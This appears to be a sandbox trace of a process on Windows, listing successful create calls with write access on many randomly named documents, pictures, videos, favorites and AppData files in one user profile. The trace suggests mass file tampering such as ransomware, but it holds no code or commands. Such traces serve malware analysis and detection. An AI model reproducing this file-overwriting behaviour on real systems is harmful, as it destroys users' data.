Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\z2lk.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\P1zhXc0ibiHP0Bs2v5.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\l6LO.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\MFSIcW7l5OKlh5.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\WQb DhJ7Wo.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\_1-Z0l.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\8Vj kyoaTN1vy L0-Vsr.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\9zW0DyjAU1Nrc.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\BoizzI4g97t.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\fXPAxGgq.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\Iq gbMO_n.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\UtVdyOv5.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\2BSi.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eOYyRR2EObYB.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eZfj5ZvjMOZ.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\O7mIpznG0.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\qDPtFMhAiJ2xQ vm.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\1TiNgxSzmOsn7Ri OkP.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\20r7oIjlUFUIkP.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\ALIdU0.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\C0 _B8qINeQrUbrt.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\faBTC43kElpNlGMFau.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\CugNJ6pb94kQCPMiK.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\pySmPr79Heo.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\Zusq yA8dO-j.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\3CYFm.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\KZrZHmvQBeSkBOCD.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\m7Zhy4P-VQ66.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\R7Kau5o.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\3Bsx2yMEE1UNteJQW\OQg8wwtsOsz4VSDTpD.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\hd0ZLwcXz17isUe1hi_.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\y lRKLTJHdvF Q.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\eyP8XnrLY rQ9ZYZ.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\lfJNr8tOZ7oDHun6ukoV.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\VFWyDHM.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\a9qF7OuHrZ4T.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\KEz1B VUjzGhZ.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\RrLl7FRJlURSY01.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\X98zhXIRm mnrxp8RLxH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\1Sx-VZ.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5ETH-YOt.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5LxZSjV.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\8GBnXsZ.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\aVltm_fp_1spcSpiUB7E.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\c7w3Be_K.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\dthjAR.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\HOw3I9OnurIF0.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\ieaOD_.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\kLhp.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\M85S8 e0deSz1O2lZp.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\pbZLWA2gHx6B.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\z ACbUu.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\NSMy5XFpc9v55E4.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\sMjYpjKhyZpf8TNaMG.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\V6CUx4Z.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\l65Ij.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\lZ73i.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\NDd8nvPiASazxx_Qnd.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\QV66E7hBIev3ByZZaaQi.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\T0lSyaUX_nTdUnU89-7l.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\M9S6OcF7aYbMU.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\MKQEfW1 O9_GGct.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\PVK83zEhiJoptl7F1vB.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\xSTCc.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\E31COVq.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\QDp9.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\utbmN6bsL1s2QoyIy_N.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\bjmnfbrNfGEXCMraZ.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\Djmg5Xg.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\pW-HWPux0H.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\UMlO p8XR.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\I0IPALQTs_bmOEuFUuOl.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\Imq8H_txUYezfovf910P.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\PSRUTQvyeJCY.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\rbkgNDQN9sYCu5S0K.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\ZPlP3lZcQ.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
